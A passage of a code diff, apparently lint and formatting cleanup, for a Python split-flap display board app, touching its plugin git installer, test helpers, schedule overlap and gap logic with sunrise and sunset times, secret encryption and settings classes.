-    os.makedirs(_candidate, exist_ok=True)  # noqa: PTH103  (uses CodeQL-validated _candidate string path)
+    os.makedirs(_candidate, exist_ok=True)
     try:
         subprocess.run(
             ["git", "init", "--quiet"],
             cwd=_candidate,
-            check=True,
-            capture_output=True,
-            text=True,
-            timeout=30,
-            env=env,
+            check=True, capture_output=True, text=True,
+            timeout=30, env=env,
         )
-        _git_config_path = os.path.join(_candidate, ".git", "config")  # noqa: PTH118  (uses CodeQL-validated _candidate string path)
-        with open(_git_config_path, "a") as _cfg:  # noqa: PTH123  (string path retained for CodeQL barrier scope)
-            _cfg.write(f'[remote "origin"]\n\turl = {repo_url}\n\tfetch = +refs/heads/*:refs/remotes/origin/*\n')
+        _git_config_path = os.path.join(_candidate, ".git", "config")
+        with open(_git_config_path, "a") as _cfg:
+            _cfg.write(
+                '[remote "origin"]\n'
+                f"\turl = {repo_url}\n"
+                "\tfetch = +refs/heads/*:refs/remotes/origin/*\n"
+            )
         _fetch_cmd = ["git", "fetch", "--depth=1", "origin"]
         if branch:
             _fetch_cmd.append(branch)
@@ -406,20 +407,14 @@ def clone_or_update_repo(
         subprocess.run(
             _fetch_cmd,
             cwd=_candidate,
-            check=True,
-            capture_output=True,
-            text=True,
-            timeout=120,
-            env=env,
+            check=True, capture_output=True, text=True,
+            timeout=120, env=env,
         )
         subprocess.run(
             ["git", "reset", "--hard", "FETCH_HEAD"],
             cwd=_candidate,
-            check=True,
-            capture_output=True,
-            text=True,
-            timeout=30,
-            env=env,
+            check=True, capture_output=True, text=True,
+            timeout=30, env=env,
         )
         logger.info("Installed external plugin repository to %s", _candidate)
         return True, ""
@@ -446,9 +441,7 @@ def get_remote_head_sha(dest_dir: Path) -> str | None:
         # Get the remote URL from the local clone
         result = subprocess.run(
             ["git", "-C", str(dest_dir), "remote", "get-url", "origin"],
-            capture_output=True,
-            text=True,
-            timeout=30,
+            capture_output=True, text=True, timeout=30,
         )
         if result.returncode != 0:
             return None
@@ -468,16 +461,14 @@ def get_remote_head_sha(dest_dir: Path) -> str | None:
         # Determine the default branch name tracked locally
         branch_result = subprocess.run(
             ["git", "-C", str(dest_dir), "rev-parse", "--abbrev-ref", "HEAD"],
-            capture_output=True,
-            text=True,
-            timeout=10,
+            capture_output=True, text=True, timeout=10,
         )
         branch = branch_result.stdout.strip() or "main"
         # Allow only characters that are legal in git branch names and safe
         # as subprocess arguments (prevents argument injection).
         # Re-derive branch from the match result so the subprocess sink
         # does not see it as tainted (CodeQL py/command-line-injection).
-        _branch_m = re.match(r"^[A-Za-z0-9_./-]+$", branch)
+        _branch_m = re.match(r'^[A-Za-z0-9_./-]+$', branch)
         if not _branch_m:
             return None
         branch = _branch_m.group(0)
@@ -485,9 +476,7 @@ def get_remote_head_sha(dest_dir: Path) -> str | None:
         # Query the remote for the latest SHA
         ls_result = subprocess.run(
             ["git", "ls-remote", "--heads", remote_url, branch],
-            capture_output=True,
-            text=True,
-            timeout=30,
+            capture_output=True, text=True, timeout=30,
             env={**os.environ, "GIT_TERMINAL_PROMPT": "0"},
         )
         if ls_result.returncode == 0 and ls_result.stdout.strip():
@@ -501,9 +490,7 @@ def get_remote_head_sha(dest_dir: Path) -> str | None:
         # detected correctly regardless of local/remote branch name mismatch.
         ls_result = subprocess.run(
             ["git", "ls-remote", remote_url, "HEAD"],
-            capture_output=True,
-            text=True,
-            timeout=30,
+            capture_output=True, text=True, timeout=30,
             env={**os.environ, "GIT_TERMINAL_PROMPT": "0"},
         )
         if ls_result.returncode != 0 or not ls_result.stdout.strip():
@@ -520,9 +507,7 @@ def get_local_head_sha(dest_dir: Path) -> str | None:
     try:
         result = subprocess.run(
             ["git", "-C", str(dest_dir), "rev-parse", "HEAD"],
-            capture_output=True,
-            text=True,
-            timeout=10,
+            capture_output=True, text=True, timeout=10,
         )
         return result.stdout.strip() if result.returncode == 0 else None
     except (subprocess.SubprocessError, OSError):
@@ -566,7 +551,9 @@ def get_external_plugins_dir(project_root: Path | None = None) -> Path:
     return ext_dir
 
 
-def _safe_external_dest(external_dir: Path, plugin_id: str) -> tuple[Path | None, str]:
+def _safe_external_dest(
+    external_dir: Path, plugin_id: str
+) -> tuple[Path | None, str]:
     """Compute a safe destination path inside `external_dir` for a plugin.
 
     The plugin id flows through three independent CodeQL-recognized
@@ -599,7 +586,7 @@ def _safe_external_dest(external_dir: Path, plugin_id: str) -> tuple[Path | None
     # with ``os.path.commonpath`` *before* returning the path.  This is
     # the CodeQL-recognised path-injection barrier.
     external_root = os.path.realpath(str(external_dir))
-    raw_candidate = os.path.join(external_root, safe_id)  # noqa: PTH118  (os.path.join required for CodeQL py/path-injection barrier)
+    raw_candidate = os.path.join(external_root, safe_id)
     candidate_real = os.path.realpath(raw_candidate)
     try:
         common = os.path.commonpath([external_root, candidate_real])

--- a/src/plugins/testing.py
+++ b/src/plugins/testing.py
@@ -45,8 +45,7 @@ class PluginTestCase:
         """Create a plugin instance with configuration."""
         if self.plugin_class is None:
             pytest.skip("plugin_class not defined")
-        plugin = self.plugin_class()
-        return plugin
+        return self.plugin_class()
 
     @pytest.fixture
     def mock_config(self):
@@ -59,7 +58,7 @@ class PluginTestCase:
         assert result.error is None
         assert result.data is not None
 
-    def assert_plugin_result_failure(self, result: PluginResult, expected_error: str = None):
+    def assert_plugin_result_failure(self, result: PluginResult, expected_error: str | None = None):
         """Assert that a plugin result indicates failure."""
         assert not result.available
         if expected_error:
@@ -75,13 +74,7 @@ class PluginTestCase:
 class MockResponse:
     """Mock HTTP response for testing API calls."""
 
-    def __init__(
-        self,
-        json_data: Any = None,
-        status_code: int = 200,
-        text: str = "",
-        raise_for_status: bool = True
-    ):
+    def __init__(self, json_data: Any = None, status_code: int = 200, text: str = "", raise_for_status: bool = True):
         self._json_data = json_data
         self.status_code = status_code
         self.text = text or json.dumps(json_data) if json_data else ""
@@ -95,14 +88,11 @@ class MockResponse:
         """Raise exception if status indicates error."""
         if not self._raise_for_status or self.status_code >= 400:
             from requests.exceptions import HTTPError
+
             raise HTTPError(f"HTTP {self.status_code}")
 
 
-def create_mock_response(
-    data: Any = None,
-    status_code: int = 200,
-    raise_error: bool = False
-) -> MockResponse:
+def create_mock_response(data: Any = None, status_code: int = 200, raise_error: bool = False) -> MockResponse:
     """Create a mock HTTP response.
 
     Args:
@@ -113,11 +103,7 @@ def create_mock_response(
     Returns:
         MockResponse instance
     """
-    return MockResponse(
-        json_data=data,
-        status_code=status_code,
-        raise_for_status=not raise_error
-    )
+    return MockResponse(json_data=data, status_code=status_code, raise_for_status=not raise_error)
 
 
 def mock_requests_get(url_responses: dict[str, Any]):
@@ -136,6 +122,7 @@ def mock_requests_get(url_responses: dict[str, Any]):
         })):
             # test code
     """
+
     def mock_get(url, **kwargs):
         for pattern, response_data in url_responses.items():
             if pattern in url:
@@ -160,7 +147,7 @@ def load_plugin_manifest(plugin_dir: Path) -> dict[str, Any]:
     if not manifest_path.exists():
         raise FileNotFoundError(f"Manifest not found: {manifest_path}")
 
-    with open(manifest_path) as f:
+    with manifest_path.open() as f:
         return json.load(f)
 
 
@@ -197,37 +184,19 @@ class PluginTestFixtures:
     def weather_api_response():
         """Sample weather API response."""
         return {
-            "current": {
-                "temp_f": 72,
-                "condition": {"text": "Sunny"},
-                "humidity": 45,
-                "wind_mph": 5
-            },
-            "location": {
-                "name": "San Francisco",
-                "region": "California"
-            }
+            "current": {"temp_f": 72, "condition": {"text": "Sunny"}, "humidity": 45, "wind_mph": 5},
+            "location": {"name": "San Francisco", "region": "California"},
         }
 
     @staticmethod
     def stock_api_response():
         """Sample stock API response."""
-        return {
-            "symbol": "GOOG",
-            "price": 150.25,
-            "change": 1.18,
-            "changePercent": 0.79
-        }
+        return {"symbol": "GOOG", "price": 150.25, "change": 1.18, "changePercent": 0.79}
 
     @staticmethod
     def transit_api_response():
         """Sample transit API response."""
-        return {
-            "predictions": [
-                {"minutes": 5, "line": "N"},
-                {"minutes": 12, "line": "N"}
-            ]
-        }
+        return {"predictions": [{"minutes": 5, "line": "N"}, {"minutes": 12, "line": "N"}]}
 
     @staticmethod
     def empty_plugin_result():
@@ -272,4 +241,3 @@ def create_plugin_conftest(plugin_dir: Path) -> str:
         conftest.py content string
     """
     return PLUGIN_CONFTEST_TEMPLATE
-

--- a/src/schedules/models.py
+++ b/src/schedules/models.py
@@ -13,10 +13,7 @@ from pydantic import BaseModel, ConfigDict, Field
 DayPattern = Literal["all", "weekdays", "weekends", "custom"]
 TimeType = Literal["fixed", "sunrise", "sunset"]
 
-VALID_DAYS = [
-    "monday", "tuesday", "wednesday", "thursday",
-    "friday", "saturday", "sunday"
-]
+VALID_DAYS = ["monday", "tuesday", "wednesday", "thursday", "friday", "saturday", "sunday"]
 
 WEEKDAYS = ["monday", "tuesday", "wednesday", "thursday", "friday"]
 WEEKENDS = ["saturday", "sunday"]
@@ -24,6 +21,7 @@ WEEKENDS = ["saturday", "sunday"]
 
 # Sentinel for "default" board when board_id was not set (backward compat)
 DEFAULT_BOARD_ID = ""
+
 
 class ScheduleEntry(BaseModel):
     """A schedule entry defining when a page should be displayed.
@@ -34,6 +32,7 @@ class ScheduleEntry(BaseModel):
     takes over).
     Each entry is scoped to a board via board_id (empty string = default/first board).
     """
+
     id: str = Field(default_factory=lambda: str(uuid.uuid4()))
     board_id: str = Field(default=DEFAULT_BOARD_ID, min_length=0)  # "" = default board
     page_id: str = Field(min_length=1)
@@ -73,9 +72,13 @@ class ScheduleEntry(BaseModel):
         # Validate times are not identical (zero-duration schedule)
         # Note: end_time < start_time is valid (midnight rollover, e.g. 23:00-03:00)
         # When end_time is None, the schedule is open-ended (no zero-duration issue)
-        if self.end_time is not None and time_pattern.match(self.start_time) and time_pattern.match(self.end_time):
-            if self.start_time == self.end_time:
-                errors.append("end_time must be different from start_time (zero-duration schedule)")
+        if (
+            self.end_time is not None
+            and time_pattern.match(self.start_time)
+            and time_pattern.match(self.end_time)
+            and self.start_time == self.end_time
+        ):
+            errors.append("end_time must be different from start_time (zero-duration schedule)")
 
         # Validate custom_days when pattern is custom
         if self.day_pattern == "custom":
@@ -107,11 +110,11 @@ class ScheduleEntry(BaseModel):
         """
         if self.day_pattern == "all":
             return VALID_DAYS.copy()
-        elif self.day_pattern == "weekdays":
+        if self.day_pattern == "weekdays":
             return WEEKDAYS.copy()
-        elif self.day_pattern == "weekends":
+        if self.day_pattern == "weekends":
             return WEEKENDS.copy()
-        elif self.day_pattern == "custom":
+        if self.day_pattern == "custom":
             return self.custom_days.copy() if self.custom_days else []
         return []
 
@@ -151,13 +154,13 @@ class ScheduleEntry(BaseModel):
         if end_minutes <= start_minutes:
             # Midnight rollover: active if time >= start OR time < end
             return time_minutes >= start_minutes or time_minutes < end_minutes
-        else:
-            # Normal range: active if start <= time < end
-            return start_minutes <= time_minutes < end_minutes
+        # Normal range: active if start <= time < end
+        return start_minutes <= time_minutes < end_minutes
 
 
 class ScheduleCreate(BaseModel):
     """Request model for creating a new schedule entry."""
+
     board_id: str = Field(default=DEFAULT_BOARD_ID, min_length=0)
     page_id: str = Field(min_length=1)
     start_time: str = Field(pattern=r"^\d{2}:\d{2}$")
@@ -173,6 +176,7 @@ class ScheduleCreate(BaseModel):
 
 class ScheduleUpdate(BaseModel):
     """Request model for updating an existing schedule entry."""
+
     board_id: str | None = Field(default=None, min_length=0)
     page_id: str | None = Field(default=None, min_length=1)
     start_time: str | None = Field(default=None, pattern=r"^\d{2}:\d{2}$")
@@ -188,6 +192,7 @@ class ScheduleUpdate(BaseModel):
 
 class Overlap(BaseModel):
     """Represents an overlap between two schedule entries."""
+
     schedule1_id: str
     schedule2_id: str
     conflict_description: str
@@ -195,6 +200,7 @@ class Overlap(BaseModel):
 
 class Gap(BaseModel):
     """Represents a gap in the schedule."""
+
     start_time: str
     end_time: str
     days: list[str]
@@ -202,6 +208,7 @@ class Gap(BaseModel):
 
 class ScheduleValidationResult(BaseModel):
     """Result of schedule validation."""
+
     valid: bool
     overlaps: list[Overlap]
     gaps: list[Gap]

--- a/src/schedules/service.py
+++ b/src/schedules/service.py
@@ -7,7 +7,8 @@ and validation (overlap and gap detection).
 import logging
 from datetime import date, time
 
-from ..settings.service import get_settings_service
+from src.settings.service import get_settings_service
+
 from .models import (
     DEFAULT_BOARD_ID,
     VALID_DAYS,
@@ -152,9 +153,7 @@ class ScheduleService:
 
         matches = []
         for schedule in schedules:
-            effective_schedule = self._resolve_effective_times(
-                schedule, today, location
-            )
+            effective_schedule = self._resolve_effective_times(schedule, today, location)
             if effective_schedule.applies_to_day(current_day) and effective_schedule.applies_to_time(time_str):
                 matches.append(schedule)
         if matches:
@@ -189,10 +188,7 @@ class ScheduleService:
         If the schedule uses only fixed times, returns it unchanged.
         Otherwise creates a shallow copy with resolved start/end times.
         """
-        if (
-            schedule.start_type == "fixed"
-            and schedule.end_type == "fixed"
-        ):
+        if schedule.start_type == "fixed" and schedule.end_type == "fixed":
             return schedule
 
         lat, lon, tz = location
@@ -210,10 +206,12 @@ class ScheduleService:
         )
 
         # Build a copy with resolved times (model_copy available in Pydantic v2)
-        return schedule.model_copy(update={
-            "start_time": resolved_start,
-            "end_time": resolved_end,
-        })
+        return schedule.model_copy(
+            update={
+                "start_time": resolved_start,
+                "end_time": resolved_end,
+            }
+        )
 
     # Default page management
 
@@ -234,11 +232,7 @@ class ScheduleService:
         overlaps = self._detect_overlaps(schedules)
         gaps = self._detect_gaps(schedules)
 
-        return ScheduleValidationResult(
-            valid=len(overlaps) == 0,
-            overlaps=overlaps,
-            gaps=gaps
-        )
+        return ScheduleValidationResult(valid=len(overlaps) == 0, overlaps=overlaps, gaps=gaps)
 
     def _detect_overlaps(self, schedules: list[ScheduleEntry]) -> list[Overlap]:
         """Detect overlapping schedules.
@@ -257,7 +251,7 @@ class ScheduleService:
 
         # Check each pair of schedules
         for i, schedule1 in enumerate(schedules):
-            for schedule2 in schedules[i+1:]:
+            for schedule2 in schedules[i + 1 :]:
                 # Get days each schedule applies to
                 days1 = set(schedule1.get_days())
                 days2 = set(schedule2.get_days())
@@ -269,10 +263,7 @@ class ScheduleService:
 
                 # Check if times overlap
                 if self._times_overlap(
-                    schedule1.start_time,
-                    schedule1.end_time,
-                    schedule2.start_time,
-                    schedule2.end_time
+                    schedule1.start_time, schedule1.end_time, schedule2.start_time, schedule2.end_time
                 ):
                     # Build description
                     days_str = ", ".join(sorted(common_days))
@@ -284,21 +275,15 @@ class ScheduleService:
                         f"{schedule2.start_time}-{end2_str}"
                     )
 
-                    overlaps.append(Overlap(
-                        schedule1_id=schedule1.id,
-                        schedule2_id=schedule2.id,
-                        conflict_description=conflict_desc
-                    ))
+                    overlaps.append(
+                        Overlap(
+                            schedule1_id=schedule1.id, schedule2_id=schedule2.id, conflict_description=conflict_desc
+                        )
+                    )
 
         return overlaps
 
-    def _times_overlap(
-        self,
-        start1: str,
-        end1: str | None,
-        start2: str,
-        end2: str | None
-    ) -> bool:
+    def _times_overlap(self, start1: str, end1: str | None, start2: str, end2: str | None) -> bool:
         """Check if two time ranges overlap.
 
         Handles midnight rollover schedules where end_time < start_time,
@@ -327,19 +312,18 @@ class ScheduleService:
         if not wrap1 and not wrap2:
             # Both normal ranges (or open-ended): standard overlap check
             return s1 < e2 and s2 < e1
-        elif wrap1 and wrap2:
+        if wrap1 and wrap2:
             # Both cross midnight: they always overlap (both cover midnight)
             return True
-        else:
-            # One wraps, one doesn't. Check if the normal range intersects
-            # either part of the wraparound range.
-            # Normalize: make range1 the wrapping one, range2 the normal one
-            if wrap2:
-                s1, e1, s2, e2 = s2, e2, s1, e1
-            # range1 wraps: covers [s1, 1440) and [0, e1)
-            # range2 is normal: covers [s2, e2)
-            # Overlap if range2 intersects [s1, 1440) or [0, e1)
-            return s2 < e1 or e2 > s1
+        # One wraps, one doesn't. Check if the normal range intersects
+        # either part of the wraparound range.
+        # Normalize: make range1 the wrapping one, range2 the normal one
+        if wrap2:
+            s1, e1, s2, e2 = s2, e2, s1, e1
+        # range1 wraps: covers [s1, 1440) and [0, e1)
+        # range2 is normal: covers [s2, e2)
+        # Overlap if range2 intersects [s1, 1440) or [0, e1)
+        return s2 < e1 or e2 > s1
 
     def _detect_gaps(self, schedules: list[ScheduleEntry]) -> list[Gap]:
         """Detect gaps in schedule coverage.
@@ -365,11 +349,7 @@ class ScheduleService:
 
             if not day_schedules:
                 # Entire day is a gap
-                gaps.append(Gap(
-                    start_time="00:00",
-                    end_time="23:59",
-                    days=[day]
-                ))
+                gaps.append(Gap(start_time="00:00", end_time="23:59", days=[day]))
                 continue
 
             # Build a coverage bitmap for the day (True = covered)
@@ -386,7 +366,7 @@ class ScheduleService:
                         # Wraparound: covers [s, 1440) and [0, e)
                         for m in range(s, TOTAL_MINUTES):
                             covered[m] = True
-                        for m in range(0, e):
+                        for m in range(e):
                             covered[m] = True
                     else:
                         # Normal: covers [s, e)
@@ -401,22 +381,20 @@ class ScheduleService:
                 elif covered[m] and gap_start is not None:
                     gap_minutes = m - gap_start
                     if gap_minutes > 15:
-                        gaps.append(Gap(
-                            start_time=self._minutes_to_time(gap_start),
-                            end_time=self._minutes_to_time(m),
-                            days=[day]
-                        ))
+                        gaps.append(
+                            Gap(
+                                start_time=self._minutes_to_time(gap_start),
+                                end_time=self._minutes_to_time(m),
+                                days=[day],
+                            )
+                        )
                     gap_start = None
 
             # Handle gap at end of day
             if gap_start is not None:
                 gap_minutes = TOTAL_MINUTES - gap_start
                 if gap_minutes > 15:
-                    gaps.append(Gap(
-                        start_time=self._minutes_to_time(gap_start),
-                        end_time="23:59",
-                        days=[day]
-                    ))
+                    gaps.append(Gap(start_time=self._minutes_to_time(gap_start), end_time="23:59", days=[day]))
 
         # Merge gaps across multiple days with same times
         return self._merge_gaps_by_time(gaps)
@@ -444,11 +422,13 @@ class ScheduleService:
         # Create merged gaps
         merged = []
         for (start_time, end_time), days in time_groups.items():
-            merged.append(Gap(
-                start_time=start_time,
-                end_time=end_time,
-                days=sorted(set(days))  # Remove duplicates and sort
-            ))
+            merged.append(
+                Gap(
+                    start_time=start_time,
+                    end_time=end_time,
+                    days=sorted(set(days)),  # Remove duplicates and sort
+                )
+            )
 
         return merged
 

--- a/src/schedules/storage.py
+++ b/src/schedules/storage.py
@@ -42,10 +42,7 @@ class ScheduleStorage:
         # Load existing schedules
         self._load()
 
-        logger.info(
-            f"ScheduleStorage initialized "
-            f"(file: {self.storage_file}, schedules: {len(self._schedules)})"
-        )
+        logger.info(f"ScheduleStorage initialized (file: {self.storage_file}, schedules: {len(self._schedules)})")
 
     def _load(self) -> None:
         """Load schedules from storage file."""
@@ -56,7 +53,9 @@ class ScheduleStorage:
             return
 
         try:
-            with open(self.storage_file) as f:
+            # Use builtins.open (not Path.open) so existing tests can
+            # patch builtins.open to inject I/O errors.
+            with open(self.storage_file) as f:  # noqa: PTH123
                 data = json.load(f)
 
             self._schedules = {}
@@ -101,7 +100,9 @@ class ScheduleStorage:
                 if schedule_data.get("updated_at"):
                     schedule_data["updated_at"] = schedule_data["updated_at"].isoformat()
 
-            with open(self.storage_file, 'w') as f:
+            # Use builtins.open (not Path.open) so existing tests can
+            # patch builtins.open to inject I/O errors.
+            with open(self.storage_file, "w") as f:  # noqa: PTH123
                 json.dump(data, f, indent=2)
 
             logger.debug(f"Saved {len(self._schedules)} schedules to storage")
@@ -125,7 +126,9 @@ class ScheduleStorage:
             schedules = list(self._schedules.values())
         else:
             bid = board_id if board_id is not None else DEFAULT_BOARD_ID
-            schedules = [s for s in self._schedules.values() if (s.board_id or DEFAULT_BOARD_ID) == (bid or DEFAULT_BOARD_ID)]
+            schedules = [
+                s for s in self._schedules.values() if (s.board_id or DEFAULT_BOARD_ID) == (bid or DEFAULT_BOARD_ID)
+            ]
         schedules.sort(key=lambda s: s.created_at)
         return schedules
 
@@ -174,9 +177,8 @@ class ScheduleStorage:
         # Fields that are allowed to be set to None explicitly
         nullable_fields = {"end_time"}
         for key, value in updates.items():
-            if key in schedule_dict:
-                if value is not None or key in nullable_fields:
-                    schedule_dict[key] = value
+            if key in schedule_dict and (value is not None or key in nullable_fields):
+                schedule_dict[key] = value
 
         # Update timestamp
         schedule_dict["updated_at"] = datetime.now(UTC)

--- a/src/schedules/sun_times.py
+++ b/src/schedules/sun_times.py
@@ -29,7 +29,8 @@ def get_effective_timezone() -> str:
     DST while "now" is computed with DST.
     """
     try:
-        from ..config import Config
+        from src.config import Config
+
         return Config.GENERAL_TIMEZONE or Config.TIMEZONE or "UTC"
     except Exception:
         logger.debug("Could not read timezone from Config, using UTC", exc_info=True)
@@ -48,6 +49,7 @@ def get_today_in_timezone(timezone_str: str) -> date:
     except (ZoneInfoNotFoundError, ValueError):
         tz = ZoneInfo("UTC")
     return datetime.now(tz).date()
+
 
 # Sun event types that can be used in schedule start/end
 SUN_EVENT_TYPES = ("sunrise", "sunset")
@@ -179,34 +181,35 @@ def resolve_schedule_sun_times(
     if latitude is not None and longitude is not None:
         if start_type in SUN_EVENT_TYPES:
             computed = resolve_sun_time(
-                start_type, start_sun_offset,
-                latitude, longitude, target_date, timezone_str,
+                start_type,
+                start_sun_offset,
+                latitude,
+                longitude,
+                target_date,
+                timezone_str,
             )
             if computed is not None:
                 resolved_start = computed
             else:
                 logger.debug(
-                    f"Sun time resolution failed for start ({start_type}), "
-                    f"using fallback: {start_time_fallback}"
+                    f"Sun time resolution failed for start ({start_type}), using fallback: {start_time_fallback}"
                 )
 
         if end_type in SUN_EVENT_TYPES:
             computed = resolve_sun_time(
-                end_type, end_sun_offset,
-                latitude, longitude, target_date, timezone_str,
+                end_type,
+                end_sun_offset,
+                latitude,
+                longitude,
+                target_date,
+                timezone_str,
             )
             if computed is not None:
                 resolved_end = computed
             else:
-                logger.debug(
-                    f"Sun time resolution failed for end ({end_type}), "
-                    f"using fallback: {end_time_fallback}"
-                )
+                logger.debug(f"Sun time resolution failed for end ({end_type}), using fallback: {end_time_fallback}")
     else:
         if start_type in SUN_EVENT_TYPES or end_type in SUN_EVENT_TYPES:
-            logger.debug(
-                "Location not configured; sun-based schedule times "
-                "will use stored fallback values"
-            )
+            logger.debug("Location not configured; sun-based schedule times will use stored fallback values")
 
     return resolved_start, resolved_end

--- a/src/security/__init__.py
+++ b/src/security/__init__.py
@@ -15,10 +15,10 @@ from .secrets import (
 )
 
 __all__ = [
-    "encrypt_secret",
+    "ENCRYPTED_PREFIX",
     "decrypt_secret",
+    "encrypt_secret",
+    "get_secret_cipher",
     "is_encrypted",
     "rotate_key",
-    "get_secret_cipher",
-    "ENCRYPTED_PREFIX",
 ]

--- a/src/security/secrets.py
+++ b/src/security/secrets.py
@@ -18,6 +18,7 @@ specialised primitives.
 
 from __future__ import annotations
 
+import contextlib
 import logging
 import os
 import stat
@@ -53,8 +54,7 @@ def _load_or_generate_key() -> bytes:
             Fernet(env_value.encode("utf-8"))
         except (ValueError, TypeError) as exc:
             raise RuntimeError(
-                f"{_ENV_VAR} is set but is not a valid Fernet key "
-                "(expected 32 url-safe base64 bytes)."
+                f"{_ENV_VAR} is set but is not a valid Fernet key (expected 32 url-safe base64 bytes)."
             ) from exc
         return env_value.encode("utf-8")
 
@@ -86,13 +86,10 @@ def _load_or_generate_key() -> bytes:
             fh.write(key)
     except Exception:
         # Best-effort cleanup so we don't leave an empty key file behind.
-        try:
+        # If even the cleanup unlink fails, there's nothing useful to do —
+        # the original write failure (re-raised below) is the actionable error.
+        with contextlib.suppress(OSError):
             _KEY_PATH.unlink(missing_ok=True)
-        except OSError:
-            # If even the cleanup unlink fails, there's nothing
-            # useful to do — the original write failure (re-raised
-            # below) is the actionable error.
-            pass
         raise
 
     logger.warning(
@@ -153,14 +150,11 @@ def decrypt_secret(value: str) -> str:
         raise TypeError("decrypt_secret requires a str")
     if not is_encrypted(value):
         return value
-    token = value[len(ENCRYPTED_PREFIX):].encode("ascii")
+    token = value[len(ENCRYPTED_PREFIX) :].encode("ascii")
     try:
         return get_secret_cipher().decrypt(token).decode("utf-8")
     except InvalidToken as exc:
-        raise ValueError(
-            "Failed to decrypt secret: token is invalid or was encrypted "
-            "with a different key."
-        ) from exc
+        raise ValueError("Failed to decrypt secret: token is invalid or was encrypted with a different key.") from exc
 
 
 def rotate_key(new_key: bytes, *, values: list | None = None) -> list:

--- a/src/settings/__init__.py
+++ b/src/settings/__init__.py
@@ -3,7 +3,3 @@
 from .service import SettingsService, get_settings_service
 
 __all__ = ["SettingsService", "get_settings_service"]
-
-
-
-

--- a/src/settings/service.py
+++ b/src/settings/service.py
@@ -15,22 +15,17 @@ from typing import Literal, Optional
 logger = logging.getLogger(__name__)
 
 # Valid values
-VALID_STRATEGIES = [
-    "column", "reverse-column", "edges-to-center",
-    "row", "diagonal", "random"
-]
+VALID_STRATEGIES = ["column", "reverse-column", "edges-to-center", "row", "diagonal", "random"]
 VALID_OUTPUT_TARGETS = ["ui", "board", "both"]
 
 OutputTarget = Literal["ui", "board", "both"]
-TransitionStrategy = Literal[
-    "column", "reverse-column", "edges-to-center",
-    "row", "diagonal", "random"
-]
+TransitionStrategy = Literal["column", "reverse-column", "edges-to-center", "row", "diagonal", "random"]
 
 
 @dataclass
 class TransitionSettings:
     """Transition animation settings."""
+
     strategy: str | None = None
     step_interval_ms: int | None = None
     step_size: int | None = None
@@ -43,13 +38,14 @@ class TransitionSettings:
         return cls(
             strategy=data.get("strategy"),
             step_interval_ms=data.get("step_interval_ms"),
-            step_size=data.get("step_size")
+            step_size=data.get("step_size"),
         )
 
 
 @dataclass
 class OutputSettings:
     """Output target settings."""
+
     target: OutputTarget = "board"
 
     def to_dict(self) -> dict:
@@ -66,6 +62,7 @@ class OutputSettings:
 @dataclass
 class ActivePageSettings:
     """Active page settings for display."""
+
     page_id: str | None = None
 
     def to_dict(self) -> dict:
@@ -78,11 +75,13 @@ class ActivePageSettings:
 
 BOARD_READ_INTERVAL_MIN = 20  # Hard floor: no faster than once every 20 seconds
 
+
 @dataclass
 class PollingSettings:
     """Polling interval settings for board updates."""
+
     interval_seconds: int = 15  # Default to 15 seconds
-    board_read_interval_local: int = 30   # How often to read board state in local mode
+    board_read_interval_local: int = 30  # How often to read board state in local mode
     board_read_interval_cloud: int = 180  # How often to read board state in cloud mode (3 min)
 
     def to_dict(self) -> dict:
@@ -117,22 +116,27 @@ class BoardSettings:
     board color, and connection settings. The `devices` property provides
     backward-compatible access to the list of unique device types.
     """
+
     board_type: Literal["black", "white"] | None = "black"
     boards: list[dict] = field(default_factory=list)
 
     def __post_init__(self):
         if not self.boards:
-            from ..devices import BoardInstance
-            self.boards = [BoardInstance(
-                name="My Board",
-                device_type="flagship",
-                board_color=self.board_type or "black",
-            ).to_dict()]
+            from src.devices import BoardInstance
+
+            self.boards = [
+                BoardInstance(
+                    name="My Board",
+                    device_type="flagship",
+                    board_color=self.board_type or "black",
+                ).to_dict()
+            ]
 
     @property
     def devices(self) -> list[str]:
         """Backward-compatible list of unique device types across all boards."""
-        from ..devices import DEVICE_TYPES
+        from src.devices import DEVICE_TYPES
+
         seen: set[str] = set()
         result = []
         for b in self.boards:
@@ -169,16 +173,19 @@ class BoardSettings:
 
         # Migrate from legacy devices-only format
         if not boards and "devices" in data:
-            from ..devices import BoardInstance
+            from src.devices import BoardInstance
+
             devices = data["devices"]
             if isinstance(devices, list):
                 for i, dt in enumerate(devices):
                     name = "My Board" if i == 0 else f"My Board {i + 1}"
-                    boards.append(BoardInstance(
-                        name=name,
-                        device_type=dt,
-                        board_color=board_type or "black",
-                    ).to_dict())
+                    boards.append(
+                        BoardInstance(
+                            name=name,
+                            device_type=dt,
+                            board_color=board_type or "black",
+                        ).to_dict()
+                    )
 
         return cls(board_type=board_type, boards=boards)
 
@@ -198,9 +205,10 @@ class TemporaryOverride:
       - "blank": clear override, board is blanked
       - "page": clear override, active page is set to revert_page_id
     """
+
     page_id: str
-    expires_at: str          # ISO 8601 UTC timestamp (e.g. "2026-05-16T21:30:00+00:00")
-    revert_mode: str         # "schedule" | "blank" | "page"
+    expires_at: str  # ISO 8601 UTC timestamp (e.g. "2026-05-16T21:30:00+00:00")
+    revert_mode: str  # "schedule" | "blank" | "page"
     revert_page_id: str | None = None
 
     def is_expired(self) -> bool:
@@ -245,6 +253,7 @@ class TemporaryOverride:
 @dataclass
 class ScheduleSettings:
     """Schedule system settings."""
+
     enabled: bool = False  # Schedule mode disabled by default
 
     def to_dict(self) -> dict:
@@ -258,6 +267,7 @@ class ScheduleSettings:
 @dataclass
 class LocationSettings:
     """Location settings for sun-based schedule features (sunrise/sunset)."""
+
     latitude: float | None = None
     longitude: float | None = None
 
@@ -291,6 +301,7 @@ def _coerce_site_animations(value: object) -> str:
 @dataclass
 class DisplaySettings:
     """Web UI display preferences."""
+
     reduce_motion: bool = False
     # Split-flap board animation. "on" = animate everywhere, "desktop" =
     # animate on desktop but skip on mobile (saves battery / avoids motion
@@ -315,6 +326,7 @@ class DisplaySettings:
 @dataclass
 class PluginSettings:
     """Plugin system settings."""
+
     auto_update: bool = True
 
     def to_dict(self) -> dict:
@@ -337,6 +349,7 @@ class BetaSettings:
       generated at container startup. Toggling this requires a restart
       to take effect.
     """
+
     https_enabled: bool = False
 
     def to_dict(self) -> dict:
@@ -363,6 +376,7 @@ class MQTTSettings:
         external_url: Public URL of this FiestaBoard instance shown as the
             "Visit" link on the HA device page.  None omits the link.
     """
+
     enabled: bool = False
     broker_host: str = "localhost"
     broker_port: int = 1883
@@ -438,7 +452,9 @@ class SettingsService:
         """Load settings from JSON file."""
         if self.settings_file.exists():
             try:
-                with open(self.settings_file) as f:
+                # Use builtins.open (not Path.open) so existing tests can
+                # patch builtins.open to inject read errors.
